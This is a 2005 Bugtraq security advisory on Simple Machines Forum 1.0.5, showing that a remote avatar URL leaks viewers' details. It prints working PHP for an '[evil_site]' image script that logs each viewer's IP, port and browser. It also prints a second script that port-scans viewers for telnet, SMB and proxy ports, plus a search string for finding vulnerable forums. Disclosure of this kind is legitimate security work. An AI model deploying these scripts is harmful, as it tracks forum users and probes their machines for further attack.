Bugtraq mailing list archives
Simple Machine Forum 1-0-5 (possibly prior versions) user IP address / information disclosure
From: retrogod () aliceposta it
Date: 31 Aug 2005 10:37:57 -0000
Simple Machine Forum 1-0-5 (possibly prior versions) user IP address / information disclosure software: site: http://www.simplemachines.org/ information disclosure: a user can choose an sumbit an avatar url like this: http://[evil_site]/image.php where image.php is a file like this: <?php $log="log".date("Ymd").".txt"; $fp=fopen($log,'a'); fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n"); fclose($fp) ?> When forum users view a page that should show the avatar, a new line is appended to log[date].txt on [evil_site] server, like this: 08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-http://[target]/[path]/[page]-GET--it-/image.php so an external user can monitor in details the forum activity, user ip addresses, have informations on OS and browsers used and so on the evil script could check for open ports/services on target machines to send them exploit code or proxies, trojan ports, do some other stuff, just an example: <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 1); $log="log".date("Ymd").".txt"; $fp=fopen($log,'a'); fputs($fp,'open ports on '.$REMOTE_ADDR.": "); $portlist="23;135;139;445;1080;3128;8080;12345"; $ports=explode(";",$portlist); for ($i=0; $i<=count($ports)-1; $i++) { $ock=fsockopen($REMOTE_ADDR,$ports[$i]); if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);} } fputs($fp,"\r\n"); fclose($fp); //then a lot of creativity ;) ?> googledork: "Powered by SMF" rgod site: http://rgod.altervista.org mail: retrogod () aliceposta it original advisory: http://rgod.altervista.org/smf105.html
Current thread:
- Simple Machine Forum 1-0-5 (possibly prior versions) user IP address / information disclosure retrogod (Aug 31)